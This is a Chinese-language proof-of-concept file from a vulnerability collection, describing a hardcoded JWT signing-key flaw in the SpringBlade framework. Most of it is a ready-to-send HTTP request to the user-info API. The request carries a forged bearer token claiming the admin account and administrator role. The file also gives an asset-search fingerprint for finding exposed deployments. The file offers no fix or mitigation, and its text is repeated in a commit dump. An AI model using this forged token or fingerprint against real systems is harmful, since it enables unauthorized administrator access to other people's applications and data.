POC/wpoc/SpringBlade/SpringBlade存在硬编码密钥漏洞.md

# SpringBlade 存在硬编码密钥漏洞

# 一、漏洞简介
SpringBlade 存在硬编码密钥漏洞。

# 二、影响版本
+ SpringBlade

# 三、资产测绘
+ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>`

![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/PHANNrjTK85iKF79/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-649072.png)

# 四、漏洞复现
```plain
GET /api/blade-user/info HTTP/1.1
Host: 
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
```

![1711951677631-572e0290-8233-4ed1-898a-f96f1c73c3ba.png](./img/PHANNrjTK85iKF79/1711951677631-572e0290-8233-4ed1-898a-f96f1c73c3ba-191658.png)


> 更新: 2024-12-13 17:10:56  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ffc80mpe9xmcekvp>
first commit 2025-03-04 23:12:57 +08:00			`# SpringBlade 存在硬编码密钥漏洞`

			`# 一、漏洞简介`
			`SpringBlade 存在硬编码密钥漏洞。`

			`# 二、影响版本`
			`+ SpringBlade`

			`# 三、资产测绘`
			+ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>`

			`![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/PHANNrjTK85iKF79/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-649072.png)`

			`# 四、漏洞复现`
			```plain
			`GET /api/blade-user/info HTTP/1.1`
			`Host:`
			`User-Agent: python-requests/2.31.0`
			`Accept-Encoding: gzip, deflate`
			`Accept: /`
			`Connection: close`
			Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
			```

			`![1711951677631-572e0290-8233-4ed1-898a-f96f1c73c3ba.png](./img/PHANNrjTK85iKF79/1711951677631-572e0290-8233-4ed1-898a-f96f1c73c3ba-191658.png)`



			`> 更新: 2024-12-13 17:10:56`
			`> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ffc80mpe9xmcekvp>`